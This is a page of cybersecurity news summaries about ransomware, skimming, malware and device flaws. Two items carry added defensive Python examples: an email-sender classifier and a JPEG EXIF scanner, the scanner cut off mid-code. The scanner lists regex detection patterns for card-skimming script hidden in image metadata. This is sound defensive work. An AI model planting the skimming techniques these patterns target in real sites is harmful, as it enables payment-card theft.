News Items

  • NIST Releases Draft Security Feature Recommendations for IoT Devices

    "Core Baseline" guide offers practical advice for using everyday items that link to computer networks.

    August 01, 2019

  • Game-theoretic Paper Wins Annual Paper Competition

    The winner of the 6th Annual Best Scientific Cybersecurity Paper Competition is "How Shall We Play a Game? A Game-theoretical Model for Cyber-warfare Games" by Tiffany Bao, Yan Shoshitaishvili, Ruoyu Wang, Christopher Kruegel, Giovanni Vigna, and David Brumley. The researchers are from Carnegie Mellon University and the University of California, Santa Barbara. The paper was originally accepted at the 30th IEEE Computer Security Foundations Symposium (CSF '17).

    To learn more visit the competition homepage: https://cps-vo.org/group/sos/papercompetition/pastcompetitions

  • NSA SoS Lablet Call for Proposals is Open

    The National Security Agency has distributed its BAA (really a request for proposals) for its next generation of SoS Lablets. The call covers lablets on the 5 Hard Problem areas in the Science of Security, on the Science of Privacy, and on Cyber Physical Systems. Proposals are due August 21. While the SoS team is not the point of contact for the contracting process, we can help direct inquiries: https://cps-vo.org/group/SoS/contact

  • "Security Researcher Finds Unencrypted Video on Bodycam From Fort Huachuca"

    A security researcher was able to extract audio and video from a used Axon body camera they purchased on eBay. The researcher extracted unencrypted data from the camera's microSD card using a forensics tool developed by the Air Force Office of Special Investigations, called Foremost. The video files within the unencrypted data show Huachuca military police performing activities such as searching a house and filling out paperwork. This article continues to discuss the discovery of unencrypted video on an Axon body camera from Fort Huachuca and other findings made by security researchers on the extraction of data from SD cards in used body cameras.

    GCN reports "Security Researcher Finds Unencrypted Video on Bodycam From Fort Huachuca"

  • "Critical SAP Bug Allows Full Enterprise System Takeover"

    SAP has disclosed to its customers a critical vulnerability rated 10 out of 10 on the CVSS bug-severity scale. SAP's widely deployed collection of enterprise resource planning (ERP) software is used by clients to manage their financials, logistics, customer-facing organizations, human resources, and other business areas. The bug has been named RECON, and it affects more than 40,000 SAP customers. Successful exploitation would allow attackers to read and modify financial records; change banking details; read personally identifiable information (PII); administer purchasing processes; sabotage or disrupt operations; achieve operating system command execution; and delete or modify traces, logs, and other files. SAP delivered a patch for the issue on Tuesday as part of its July 2020 Security Note.

    Threatpost reports: "Critical SAP Bug Allows Full Enterprise System Takeover"

  • "Filter Protects Against Deepfake Photos and Videos"

    Deepfakes are fake images, audio recordings, or videos developed using Machine Learning (ML). The continued advancement of deepfakes will decrease the effectiveness of security systems that apply facial recognition technologies for authentication. Therefore, researchers have created an algorithm that generates an adversarial attack against facial manipulation systems to prevent deepfake videos and photos. The algorithm allows users to apply a protective filter to their images or videos before uploading them to the internet. Researchers must continue the development of sophisticated methods for disrupting deepfakes. This article continues to discuss recent advances in deepfake technology, the new algorithm created to prevent deepfakes, and the importance of developing more techniques to combat deepfakes.

    NextGov reports "Filter Protects Against Deepfake Photos and Videos"

  • "Backdoors Identified in C-Data Fiber Broadband Devices"

    Security researchers have identified backdoors in 29 C-Data Fiber-To-The-Home (FTTH) Optical Line Terminal (OLT) devices. According to the researchers, an attacker can extract administrator credentials via the command-line interface (CLI) if they have backdoor access to the OLT. Through the abuse of CLI access, an attacker can execute commands as root and exfiltrate information using the embedded web server. The vulnerabilities could also allow attackers to steal web and telnet credentials, as well as SNMP communities without authentication. This article continues to discuss the backdoors found in C-Data fiber broadband devices and what the exploitation of these backdoors could allow attackers to do.

    Security Week reports "Backdoors Identified in C-Data Fiber Broadband Devices"

  • "TrickBot Malware Mistakenly Warns Victims That They Are Infected"

    The developers of the infamous modular banking trojan, called TrickBot, have made a mistake that results in alerts to victims. Once infected, victims will receive a warning that brings attention to the malware's presence on their device and the need to contact their administrator. TrickBot malware is commonly distributed via phishing campaigns. It can steal OpenSSH keys, passwords, cookies, a domain's Active Directory Services database, and more. This article continues to discuss the test module mistakenly left by TrickBot's creators that warns those infected by the malware, what victims should do when they see this warning, and the banking trojan's traditional capabilities.

    Bleeping Computer reports "TrickBot Malware Mistakenly Warns Victims That They Are Infected"

  • "Popular Home Routers Plagued by Critical Security Flaws"

    In a new study, researchers tested more than 100 consumer-grade routers from seven large vendors. The researchers discovered that nearly all tested routers were affected by scores of unpatched and often severe security flaws, which could put users at risk of a cyberattack. Even routers that had been recently updated were still affected by many vulnerabilities. The researchers found that the average length of time since a router's latest security update was 378 days. Of the routers tested, 46 had not received any security update within the last year. On average, the routers were affected by 53 critical-rated vulnerabilities.

    WeLiveSecurity reports: "Popular Home Routers Plagued by Critical Security Flaws"

  • "Coordinating Disclosures of Medical Device Vulnerabilities"

    Healthcare organizations continue to face significant cybersecurity threats that could affect people's well-being and safety. Therefore, the medical device manufacturer, Becton, Dickinson and Company (BD), has enhanced its coordinated vulnerability disclosure process established to help in the identification, evaluation, and communication of problems to regulators and industry stakeholders. According to Dana-Megan Rossi, BD's director of information security threat and vulnerability management, the company works closely with security researchers to improve the protection of medical devices against cyberattacks. This article continues to discuss BD's collaboration with security researchers to address vulnerabilities in medical devices and other efforts to improve medical device cybersecurity.

    GovInfoSecurity reports "Coordinating Disclosures of Medical Device Vulnerabilities"

  • "Avoiding Malware on the Move"

    In an article published in the International Journal of Internet Technology and Secured Transactions, researchers from India discussed the security measures implemented for mobile devices that use Google's Android operating system. The researchers suggest that Android and its application ecosystem are more vulnerable to malware because of their more open nature, while the more closed and isolated operating system used by Apple devices is less vulnerable to malware. Evidence shows that more than 90% of mobile malware targets Android, more than any other mobile operating system. This article continues to discuss Android's vulnerability to malware, the increase in infected Android apps, and the need for efficient anti-malware software that accurately detects mobile malware.

    TechXplore reports "Avoiding Malware on the Move"

  • "USB Storage Devices: Convenient Security Nightmares"

    USB storage devices are very convenient; however, from a business security perspective, their highly accessible and portable nature makes them a complete nightmare. New research found that, due to COVID-19, there has been a 123 percent increase in the volume of data downloaded to USB storage devices by employees. Because of this sharp rise in the use of USB storage devices, hundreds of terabytes of potentially sensitive, unencrypted corporate data are floating around at any given time, significantly increasing the risk of severe data loss. The researchers suggest that organizations implement USB control and encryption to substantially reduce the risk of a data breach.

    Help Net Security reports: "USB Storage Devices: Convenient Security Nightmares"

  • "Securing the Smart Home"

    A team of researchers from India has presented a new intrusion detection system for smart homes, called "SmartGuard." The system detects malicious behavior within a smart home's network and also identifies malicious communications coming from outside. The team says the system uses a cluster-based approach to detection. This article continues to discuss the proposed SmartGuard intrusion detection system and the importance of securing smart homes against hackers.

    Homeland Security News Wire reports "Securing the Smart Home"

  • "7 in 10 Organizations Suffer Public Cloud Security Breach"

    Findings from a survey report recently released by Sophos, titled "The State of Cloud Security 2020," suggested that 50% of multi-cloud organizations are more likely to suffer cloud security breaches than organizations using a single cloud environment. According to the report, most organizations that host data or workloads in the public cloud experienced ransomware attacks, account compromise, data theft, or cryptojacking last year. The report also highlights the rise in accidental database exposure due to misconfigurations. This article continues to discuss the increase in cloud security incidents and risks.

    CISO MAG reports "7 in 10 Organizations Suffer Public Cloud Security Breach"

  • "Zero-Day Flaw Found in Zoom For Windows 7"

    Researchers at ACROS Security have discovered a previously unknown flaw in the videoconferencing software Zoom. An adversary who successfully exploits the vulnerability could access files on the vulnerable computer, and if the user is a local administrator, the attacker could completely take over the computer. The zero-day vulnerability applies to Zoom software running on Windows 7, or even older operating systems.

    Cyberscoop reports: "Zero-Day Flaw Found in Zoom For Windows 7"

  • "Honeywell Cybersecurity Research Reveals The Risk Of USB Threats To Industrials Has Doubled Over 12 Months"

    A new study conducted by the technology firm Honeywell emphasizes the dangers posed by USB devices to the security of operational technology (OT) systems. The study examined cybersecurity threat data collected from industrial facilities worldwide via Honeywell's Secure Media Exchange (SMX) technology. Findings from the latest Honeywell Industrial USB Threat Report show that the total number of threats posed by USB removable media to industrial process control networks is still high. The number of threats targeting OT systems increased from 16% to 28% over a period of 12 months. The study also pointed out that 1 in 5 threats was designed to leverage USB removable media as an attack vector. This article continues to discuss key findings pertaining to the risk of USB threats to industrial systems.

    PR Newswire reports "Honeywell Cybersecurity Research Reveals The Risk Of USB Threats To Industrials Has Doubled Over 12 Months"

  • "Google Fixes Smartwatch Security Problem Discovered by Purdue Researchers"

    Google released a patch to fix a vulnerability that researchers at Purdue University found in its Wear OS smartwatches. Exploitation of the vulnerability could have allowed attackers to crash specific apps, cause the watch to become unresponsive, or make the watch continuously reboot. The researchers used a tool they developed, called Vulcan, to discover the vulnerability. Vulcan applies fuzzing, a software testing technique in which a program is fed invalid or random data until it reveals a flaw. The Vulcan tool helped the researchers identify the vulnerability in the latest version of Wear OS and in 13 highly-downloaded smartwatch apps available on Google Play, including Google Fit, Nike Run Club, and Google Maps. This article continues to discuss the critical vulnerability found in Google's Wear OS smartwatches, the tool used to make this discovery, and the growing insecurity of wearable devices.

    Purdue Today reports "Google Fixes Smartwatch Security Problem Discovered by Purdue Researchers"

  • "Billions of Passwords Now Available on Underground Forums, Say Security Researchers"

    An 18-month analysis conducted by cybersecurity researchers at Digital Shadows on cybercriminals' access to and use of stolen account details revealed that usernames and passwords for more than 15 billion accounts are being distributed on the dark web. The stolen credentials circulating on underground forums allow cybercriminals to access network administrator accounts, bank accounts, virtual private networks (VPNs), streaming services, and more. Researchers warn that many account credentials are getting leaked online because of the use of weak passwords, which can easily be cracked through the performance of brute force attacks. Users are encouraged to create a unique password and apply multi-factor authentication (MFA) for each of their online accounts. This article continues to discuss the proliferation of stolen account credentials on the dark web, the value of these credentials to attackers, and how people can strengthen their online accounts' security.

    ZDNet reports "Billions of Passwords Now Available on Underground Forums, Say Security Researchers"

  • "Automotive Cyber Incidents Doubled in 2019, Reaching 188 Vulnerabilities"

    Connected vehicles introduce significant risks to safety. As vehicles increase in connectivity, they become more vulnerable to being hacked, manipulated, and disabled by cybercriminals. The existence of vulnerabilities in connected cars creates more opportunities for cybercrime. Atlas VPN found that the number of automotive hacking incidents in 2019 doubled compared to the data of 2018. Data shows that from 2016 to 2019, the number of cyber incidents increased more than seven times. The number of cyber incidents in 2018 increased by almost 138%. This article continues to discuss the increase in automotive cyber incidents last year and the most common attack vectors for connected vehicles.

    CXOtoday reports "Automotive Cyber Incidents Doubled in 2019, Reaching 188 Vulnerabilities"

  • "Magecart-Related Group Hits 570 Websites, Taking 184,000 Card Numbers"

    A hacking group known as "Keeper" has targeted 570 e-commerce sites to steal customer financial information using Magecart attacks. The hacking group has been around since 2017 and has been able to compromise more than 180,000 payment cards as part of a covert fraud effort. The adversaries inserted malicious computer code onto the sites, usually by exploiting weaknesses in technology provided by the sites' third-party software suppliers. Magecart attacks have become a daily occurrence for small to medium-sized e-commerce businesses around the world.

    Cyberscoop reports: "Magecart-Related Group Hits 570 Websites, Taking 184,000 Card Numbers"

  • "Mounting IIoT Cyber Risks Must Be Addressed Now to Prevent Catastrophe"

    The speed and sophistication of cyberattacks on the Industrial Internet of Things (IIoT) continue to grow. A report from Lloyd's Register Foundation, the U.K.-based global safety charity, suggests preventative security measures to address the increasing IIoT risks to energy, transport, manufacturing, and other critical infrastructure sectors. The report identifies key emerging risks and existing capability gaps that emphasize the insufficiency of the current pace of change in operational cybersecurity. Organizations are encouraged to address capability gaps by investing in forensic readiness processes, considering how security controls may fail as IoT devices increase, investing in training for staff on IoT standards, and more. This article continues to discuss the report's goal and its suggested actions for addressing rising IIoT cyber risks.

    SC Media reports "Mounting IIoT Cyber Risks Must Be Addressed Now to Prevent Catastrophe"

  • "Microsoft Seizes Domains Used in COVID-19-Themed Attacks"

    The US District Court for the Eastern District of Virginia granted Microsoft permission to seize control of malicious domains used in COVID-19-themed attacks, such as those executed against Office 365 accounts, which have become common over the past several months. According to the company, COVID-19-themed Business Email Compromise (BEC) attacks, involving millions of phishing emails, have been observed targeting Microsoft business users in over five dozen countries. The massive scale and persistence of these attacks prompted Microsoft to seek legal action. Threat actors are increasingly exploiting the fear and concern surrounding the coronavirus outbreak to improve the success of email and social engineering lures. Attackers have registered thousands of COVID-19-themed domains in the past several months to trick unsuspecting Internet users into giving up their personal data, credentials, or other sensitive information. This article continues to discuss the rise in coronavirus-related attacks and Microsoft's complaint filed against COVID-19-themed BEC attacks.

    Dark Reading reports "Microsoft Seizes Domains Used in COVID-19-Themed Attacks"

  • "Cerberus Banking Trojan Unleashed on Google Play"

    Researchers first spotted Cerberus malware last August, when it was being offered in a malware-as-a-service (MaaS) model. Since then, a newly discovered variant of the Cerberus Android trojan has been spotted. The malware has become much more sophisticated and has more info-harvesting capabilities. Researchers found a malicious Android app on the Google Play app marketplace that distributes the Cerberus banking trojan. The application is called "Calculadora de Moneda" and is a Spanish currency converter app. The Cerberus malware can steal a user's banking credentials, bypass security measures, including two-factor authentication, and access text messages. The application has been downloaded 10,000 times so far. Cerberus malware disguises itself as a genuine app to access the banking details of unsuspecting users.

    Threatpost reports: "Cerberus Banking Trojan Unleashed on Google Play"

  • "Cyber Command Backs 'Urgent' Patch for F5 Security Vulnerability"

    F5 Networks, one of the leading global providers of enterprise networking equipment, recently patched a critical vulnerability found in its BIG-IP family of application delivery controllers. The remote code execution vulnerability impacts the BIG-IP products' Traffic Management User Interface (TMUI). The US Department of Defense's Cyber Command and the Cybersecurity and Infrastructure Security Agency (CISA) encourage organizations to apply the patch for the vulnerability as its exploitation could lead to complete system compromise. The flaw received a Common Vulnerability Scoring System (CVSS) score of 10, emphasizing its high level of severity. This article continues to discuss the severity and exploitation of the critical BIG-IP flaw.

    CyberScoop reports "Cyber Command Backs 'Urgent' Patch for F5 Security Vulnerability"

  • "Android Users Hit with 'Undeletable' Adware"

    Researchers at Kaspersky have discovered that 14.8 percent of Android users who were targeted with mobile malware or adware last year were left with undeletable files. Most of the users affected by mobile adware or mobile malware suffered a system partition infection, which made the malicious files undeletable. The undeletable files were mostly trojans that can install and run apps without the user's knowledge. The researchers found that the most common types of malware used to target users were two older threats: the Lezok and Triada trojans.

    Threatpost reports: "Android Users Hit with 'Undeletable' Adware"

  • "Researchers Use AI to Highlight Zoom's Privacy Risks"

    According to researchers at Ben-Gurion University of the Negev (BGU), it is relatively easy to extract personal information such as face images, names, ages, and more from public screenshots of video meetings held on Zoom and other video conferencing platforms. Data collected from video conference meetings can be cross-referenced with social network data using image processing, text recognition, and forensics. Linkage attacks pose a threat to individuals' privacy as well as the privacy and security of organizations. This article continues to discuss the increased use of video conferencing platforms during the COVID-19 pandemic, the application of Artificial Intelligence (AI) to perform linkage attacks on users, and recommendations for mitigating privacy risks associated with such platforms.

    VB reports "Researchers Use AI to Highlight Zoom's Privacy Risks"

  • "Thousands of MongoDB Databases Ransacked, Held For Ransom"

    Attacks that involve infiltrating cloud databases and holding them for ransom have been around since at least 2016. Security researchers at GDI Foundation have discovered that an unknown cybercriminal has infiltrated 22,900 unsecured MongoDB databases. The adversary wipes their contents and leaves behind a ransom note demanding bitcoin in return for the data. The adversary warns that if the ransom is not paid within two days, they will notify the authorities in charge of enforcing the European Union's General Data Protection Regulation (GDPR). The adversary asks for 0.015 bitcoins (about $140) to return the data.

    WeLiveSecurity reports: "Thousands of MongoDB Databases Ransacked, Held For Ransom"

  • "New Research Reveals Privacy Risks Of Home Security Cameras"

    Researchers from Queen Mary University of London and the Chinese Academy of Sciences conducted a study that reveals the privacy risks posed by home security cameras. The study was performed using data from a major home Internet Protocol (IP) security camera provider. The study's findings showed that attackers could monitor and analyze the traffic generated by IP home security cameras to predict whether a house is occupied. Past traffic generated by these cameras could also be used by attackers to predict future activity, leaving camera owners' homes more vulnerable to burglary. This article continues to discuss key findings from the study on inferring privacy-compromising information about an IP home security camera's owner without inspecting the video content itself.

    SCIENMAG reports "New Research Reveals Privacy Risks Of Home Security Cameras"

  • "Vulnerable Drivers Can Enable Crippling Attacks Against ATMs and POS Systems"

    Researchers from the security firm, Eclypsium, have discovered vulnerabilities and design flaws in 40 Windows drivers from at least 20 different hardware vendors. Servers, workstations, and laptops are not the only types of devices that run the Windows operating system. Windows is also used on automated teller machines (ATMs), point of sale (POS) terminals, self-service kiosks, and medical devices, which are generally harder to update. According to Eclypsium researchers, the exploitation of vulnerable drivers can enable various attacks against ATMs and POS systems. These attacks can lead to privilege escalation, unauthorized access to sensitive information, and the theft of money or customer data. This article continues to discuss potential attacks against ATM and POS devices through the abuse of vulnerable drivers and the importance of implementing security in the design of device drivers.

    CSO Online reports "Vulnerable Drivers Can Enable Crippling Attacks Against ATMs and POS Systems"

  • "Government Ransomware Gangs Are Doing Their Homework Before Encrypting Corporate Data"

    According to Matt Travis, deputy director of the U.S. Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA), ransomware gangs are doing much more than just infiltrating networks and stealing data. The criminal hackers are also secretively looking around networks to find financial data, such as balance sheets, to gain intelligence on how much of a ransom they can demand from a targeted business. The longer cybercriminals go undetected on a network, the more power they gain. Therefore, companies must take steps to reduce hackers' dwell time. This article continues to discuss criminal hackers' performance of reconnaissance activities before ransomware delivery, recent attacks by known ransomware gangs, and a common misconception with ransomware.

    CyberScoop reports "Government Ransomware Gangs Are Doing Their Homework Before Encrypting Corporate Data"

  • "Apache Guacamole Opens Door for Total Control of Remote Footprint"

    Apache Guacamole is a popular infrastructure for enabling remote working. Researchers have recently discovered that it is vulnerable to a number of security bugs related to the Remote Desktop Protocol (RDP). If an adversary gains control of the gateway, they can eavesdrop on all incoming sessions, record all the credentials used, and start new sessions to control the rest of the computers within the organization. The researchers suggest that admins update their systems to avoid attacks aimed at stealing information or achieving remote code execution.

    Threatpost reports: "Apache Guacamole Opens Door for Total Control of Remote Footprint"

  • "Schools Already Struggled with Cybersecurity. Then Came COVID-19"

    The COVID-19 pandemic has amplified the cybersecurity challenges faced by school districts across the United States. Before the coronavirus crisis, school districts had already been experiencing cybersecurity shortcomings because of the lack of dedicated funding and the shortage of skilled security professionals to assess and enhance cybersecurity defenses. These insufficiencies have resulted in system setup errors and poor patch management that leave schools and their students vulnerable to hackers and scams. The shift to online learning has intensified these risks. Millions of teachers and students must now use chat software, lesson portals, digital message boards, and other online tools, which could be used as attack vectors if they are not set up with proper authentication and controls. Attackers can also abuse the tools used for accessing school networks remotely, including virtual private networks (VPNs) and the Remote Desktop Protocol (RDP), to infiltrate systems. This article continues to discuss the cybersecurity challenges facing school districts, the amplification of these challenges by the pandemic, vulnerabilities discovered in different school systems, and current K-12 digital security incident-reporting.

    Wired reports "Schools Already Struggled with Cybersecurity. Then Came COVID-19"

  • "Ransomware Operators Claim They Hacked Printing Giant Xerox"

    Maze ransomware operators claim to have stolen files from the systems of the U.S. printing giant Xerox. The cybercriminals are threatening to leak the stolen information to the public if Xerox does not pay the demanded ransom. Other companies that have fallen victim to Maze ransomware attacks include Cognizant, Conduent, MaxLinear, and LG. The possibility of competitors or other criminal groups having access to leaked data further pressures victims into meeting the demands for ransom payments. This article continues to discuss Maze ransomware operators' alleged targeting of Xerox and other major companies that have been targeted by the operators.

    Security Week reports "Ransomware Operators Claim They Hacked Printing Giant Xerox"

  • "Ripple20 Threatens Increasingly Connected Medical Devices"

    JSOF security researchers recently discovered a series of vulnerabilities, dubbed "Ripple20", that impact connected devices in the enterprise, industrial, and healthcare sectors. The Ripple20 vulnerabilities were found in a low-level TCP/IP software library, which many IoT device manufacturers build directly into their devices or integrate via embedded third-party components. These flaws could enable denial-of-service (DoS) attacks, information disclosure, remote code execution, and other malicious activities. Infusion pumps were among the devices confirmed to be vulnerable. The exploitation of Ripple20 vulnerabilities in infusion pumps poses a significant threat to safety, as these devices deliver doses of medicine directly to patients. This article continues to discuss the potential impact of Ripple20, the growing concern about the security of connected medical devices, and what hospitals can do to protect their medical devices.

    Dark Reading reports "Ripple20 Threatens Increasingly Connected Medical Devices"

  • "FakeSpy Android Malware Spread Via 'Postal-Service' Apps"

    Researchers have discovered a new "smishing" campaign carried out by the Roaming Mantis threat group. The adversaries are targeting Android mobile devices and spreading the FakeSpy infostealer malware, which is disguised as legitimate postal-service apps. The researchers found that the postal apps used to disguise FakeSpy are country-specific, including USPS, Chunghwa Post, the British Royal Mail, the German Deutsche Post, France's La Poste, Japan Post, and Swiss Post. When the malware is activated, it steals the victim's SMS messages, financial data, and more.

    Threatpost reports: "FakeSpy Android Malware Spread Via 'Postal-Service' Apps"

  • "Philips Release Patches for Vulnerabilities Affecting its Medical Devices"

    Philips, a leading health technology solutions company, recently reported vulnerabilities discovered in its ultrasound medical devices to the U.S. Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA). According to an official statement from CISA, the vulnerabilities were found in Ultrasound ClearVue, Ultrasound CX, Ultrasound EPIQ/Affiniti, Ultrasound Sparq, and Ultrasound Xperius devices. Attackers can view or alter information by exploiting the security flaws discovered in these devices. CISA recommends that healthcare organizations implement physical security measures, apply defense-in-depth strategies, disable unnecessary accounts, and more, to prevent the abuse of the vulnerabilities. This article continues to discuss the security flaws identified in ultrasound medical devices and Philips' response to the flaws, as well as preventative measures recommended by CISA and other research that highlight the vulnerability of medical devices to cyberattacks.

    CISO MAG reports "Philips Release Patches for Vulnerabilities Affecting its Medical Devices"

  • news

    Visible to the public "Resilience Improved, but Response Dragged Down by Too Many Tools, Too Few Playbooks"

    IBM Security's fifth annual Cyber Resilient Organization Report, based on a global survey conducted by the Ponemon Institute, found that most organizations' incident response plans are still inadequate. More than 70 percent of organizations reported that their security response plans are applied inconsistently, are ad hoc, or do not exist at all. According to the report, the large number of different security solutions and technologies used by security teams has weakened security response rather than strengthened it. Security experts call on organizations to establish a formal incident response plan with playbooks for specific attack types and to update their cybersecurity posture. This article continues to discuss key findings from IBM Security's latest global report on organizations' security response plans.

    SC Media reports "Resilience Improved, but Response Dragged Down by Too Many Tools, Too Few Playbooks"

  • news

    Visible to the public "Email Sender Identity is Key to Solving the Phishing Crisis"

    There have been massive advances in perimeter and endpoint defenses, but email remains a major cybersecurity risk for many companies. Almost 90 percent of email attacks manipulate the sender's identity to fool recipients and set up social engineering. Phishing campaigns mutate quickly, continuously shifting tactics and lures. Adversaries have learned how to get through email security at all three defensive layers most organizations currently use: the gateway, the mail client, and the end user. To protect themselves from email attacks, organizations need to start validating sender identities. For this to be effective, sender identity solutions will need to address all three types of identity-based attacks: open-signup attacks (a free webmail account posing as a trusted person), untrusted-domain attacks (an attacker-registered lookalike domain), and domain-spoofing attacks (a forged message claiming an organization's exact domain).

    Threatpost reports: "Email Sender Identity is Key to Solving the Phishing Crisis"
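    The three attack types above call for three different checks, because a single control does not catch them all: DMARC alignment exposes exact-domain spoofing, but an attacker who registers a lookalike domain or signs up for a free webmail account passes SPF, DKIM and DMARC cleanly. The following classifier is an added example written for this page, not code from Threatpost or from any vendor mentioned in the article. It reads the From header and the Authentication-Results header an inbound mail gateway stamps (RFC 8601), and sorts the sender into one of the three categories or marks it trusted or merely external. The trusted domains, protected display names, freemail list, homoglyph folding and the sample messages are all constructed for the example; the reading of the three category names is the editor's interpretation of the article's terms.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed organisation context, constructed for this example.
TRUSTED_DOMAINS = {"example.com", "example.co.uk"}           # domains we own or verify
PROTECTED_NAMES = {"alice example", "example accounts payable"}  # identities worth impersonating
OPEN_SIGNUP_DOMAINS = {"gmail.com", "outlook.com", "yahoo.com", "protonmail.com"}
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "@": "a"})


def normalize(label: str) -> str:
    """Fold common lookalike tricks so 'examp1e' and 'exarnple' compare equal to 'example'."""
    return label.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; small enough here that the O(len(a)*len(b)) cost is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(domain: str) -> bool:
    """True if the leftmost label resembles a trusted domain's label or embeds it (example-login.net)."""
    label = normalize(domain.split(".")[0])
    for trusted in TRUSTED_DOMAINS:
        t = normalize(trusted.split(".")[0])
        if label == t or edit_distance(label, t) <= 1 or (t in label and label != t):
            return True
    return False


def auth_results(msg) -> dict:
    """Collect spf/dkim/dmarc verdicts from Authentication-Results headers (RFC 8601)."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header):
            results[method] = verdict.lower()
    return results


def classify_sender(raw_message: str) -> str:
    """Return one of: trusted, domain-spoofing, untrusted-domain, open-signup, external."""
    msg = message_from_string(raw_message)
    display, address = parseaddr(msg.get("From", ""))
    domain = address.rpartition("@")[2].lower()
    auth = auth_results(msg)

    if domain in TRUSTED_DOMAINS:
        # Exact-domain forgery: only DMARC alignment separates the real sender from a spoof.
        return "trusted" if auth.get("dmarc") == "pass" else "domain-spoofing"
    if domain in OPEN_SIGNUP_DOMAINS:
        # Freemail authenticates fine; the identity being abused is the display name.
        return "open-signup" if display.strip().lower() in PROTECTED_NAMES else "external"
    if is_lookalike(domain):
        # Attacker-registered domain: SPF/DKIM/DMARC pass because the attacker controls it.
        return "untrusted-domain"
    return "external"


# Constructed sample messages (headers only); the gateway name mx.example.com is assumed.
SAMPLES = {
    "legit": "From: Alice Example <alice@example.com>\n"
             "Authentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass\n"
             "Subject: Q3 figures\n\n",
    "spoof": "From: IT Helpdesk <helpdesk@example.com>\n"
             "Authentication-Results: mx.example.com; spf=fail; dkim=none; dmarc=fail\n"
             "Subject: Your password expires today\n\n",
    "lookalike": "From: Accounts <billing@examp1e.com>\n"
                 "Authentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass\n"
                 "Subject: Updated bank details\n\n",
    "freemail": "From: Alice Example <alice.example.ceo@gmail.com>\n"
                "Authentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass\n"
                "Subject: Urgent wire transfer\n\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:10s} -> {classify_sender(raw)}")
```

Note that the "lookalike" and "freemail" samples carry dmarc=pass: that is exactly why an authentication-only control stops at the first category, and why the lookalike and display-name checks have to be policy the receiving organization defines for itself.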

  • news

    Visible to the public "New EvilQuest macOS Ransomware is a Smokescreen For Other Threats"

    A new macOS ransomware dubbed EvilQuest was first spotted in late June by a malware researcher with K7 Lab. The ransomware impersonates the Google Software Update program and is usually delivered bundled with pirated versions of popular macOS software. Adversaries use the ransomware as a smokescreen: its "noisiness" hides other things happening on the system in the background, such as the installation of a keylogger and a reverse shell and the exfiltration of files containing valuable information.

    Help Net Security reports: "New EvilQuest macOS Ransomware is a Smokescreen For Other Threats"

  • news

    Visible to the public "No Keys to the Kingdom: New Single Sign-On Algorithm Provides Superior Privacy"

    Researchers from the Tokyo University of Science (TUS) have developed a new single sign-on (SSO) algorithm that prevents the disclosure of a user's identity and personal information to third parties. SSO systems let users access different services and applications with a single set of credentials (username and password); for example, one may log onto a website using their Facebook or Gmail login credentials. However, the identity providers behind SSO are third-party systems, often run by Big Tech companies that have been reported to collect personal information without users' permission for purposes such as targeted advertising. This article discusses the advantages of SSO systems, the concerns surrounding them, and the TUS researchers' proposed cryptographic scheme for hiding sensitive information from third parties when accessing services via SSO.

    The Tokyo University of Science reports "No Keys to the Kingdom: New Single Sign-On Algorithm Provides Superior Privacy"

  • news

    Visible to the public "iOS 14 Flags TikTok, 53 Other Apps Spying on iPhone Clipboards"

    The iOS 14 beta has been released. iOS 14 can identify applications that silently and automatically read whatever a user copies to their mobile device's clipboard, and it flagged TikTok and 53 other apps for reading iPhone clipboards. The clipboard may hold information a user does not want anyone else to see, such as passwords copied from a password manager, bank account details, and Bitcoin addresses. The covert reading is possible not only for a device's own clipboard but also for content copied on nearby devices, as long as the devices share the same Apple ID and are within about 10 feet.

    Naked Security reports: "iOS 14 Flags TikTok, 53 Other Apps Spying on iPhone Clipboards"

  • news

    Visible to the public "Hackers Hide Credit Card Stealing Script in Favicon Metadata"

    Malwarebytes recently reported that hackers are inserting malicious code into the Exchangeable Image File Format (EXIF) metadata of a favicon, the small image web browsers use as a graphical representation of a website. Hiding a script in a favicon's EXIF data lets the attackers evade detection while stealing credit card information. The attack is considered a variant of a Magecart attack; such attacks have been performed against Macy's, British Airways, Tupperware, and other widely popular companies. According to Malwarebytes, credit cards stolen through Magecart attacks are sold on dark web markets or used to make fraudulent purchases. This article continues to discuss the use of favicon metadata to hide credit card-stealing scripts and other techniques Magecart hackers apply to circumvent detection.

    Bleeping Computer reports "Hackers Hide Credit Card Stealing Script in Favicon Metadata"
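    An image file is not supposed to carry executable content, so a direct detection is to walk the image's metadata and look for JavaScript where a short human-readable string belongs. The scanner below is an added example written for this page, not code from Malwarebytes or Bleeping Computer. It parses a JPEG's marker segments by hand, decodes the Exif APP1 segment down to the ASCII-typed tags of IFD0, and flags any tag whose text matches script patterns. The skimmer text, the use of the Copyright tag as the carrier, the JPEG container and the pattern list are assumptions made for the example; the article does not name the tag or the image format, and the sample images are constructed in code rather than taken from a real site.

```python
import re
import struct

# ASCII-typed EXIF tags (type 2) that an attacker can fill with arbitrary text.
ASCII_TAG_NAMES = {0x010E: "ImageDescription", 0x0131: "Software",
                   0x013B: "Artist", 0x8298: "Copyright"}

# Strings that have no business in an image caption but are typical of a card skimmer.
SCRIPT_PATTERNS = [r"\beval\s*\(", r"\bfunction\s*\(", r"\bdocument\.", r"\bwindow\.",
                   r"\bXMLHttpRequest\b", r"\bfetch\s*\(", r"\batob\s*\("]


def iter_jpeg_segments(data: bytes):
    """Yield (marker, body) for each marker segment before the entropy-coded scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
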